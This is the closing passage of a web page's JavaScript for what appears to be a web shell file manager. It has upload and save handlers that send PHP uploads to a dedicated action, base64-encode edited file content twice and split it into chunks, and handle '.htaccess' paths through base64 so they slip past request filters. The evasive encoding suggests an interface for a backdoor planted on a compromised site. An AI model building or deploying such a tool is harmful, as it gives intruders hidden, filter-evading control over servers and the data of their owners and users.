                        await apiCall('upload_php', fd, true);
                    } else {
                        fd.append('filename_base64', btoa(originalName));
                        await apiCall('upload', fd, true);
                    }
                } catch (error) {
                    alert(`Failed to process file ${file.name}: ${error.message}`);
                }
            }
            e.target.value = '';
            render();
        });

        dom.saveBtn.addEventListener('click', () => {
            const path = dom.editorFilename.textContent;
            const content = btoa(btoa(dom.editor.value));
            const fd = new FormData();
            const chunkSize = 4096;
            for (let i = 0; i < content.length; i += chunkSize) {
                fd.append('content_chunks[]', content.substring(i, i + chunkSize));
            }
            let action = 'save_content';
            if (path.includes('.htaccess')) {
                action = 'save_content_b64';
                fd.append('path_b64', btoa(path));
            } else {
                fd.append('path', path);
            }
            apiCall(action, fd, true).then(result => {
                if(result) {
                    dom.editorModal.style.display = 'none';
                    render();
                }
            });
        });

        render();
    });</script></body></html>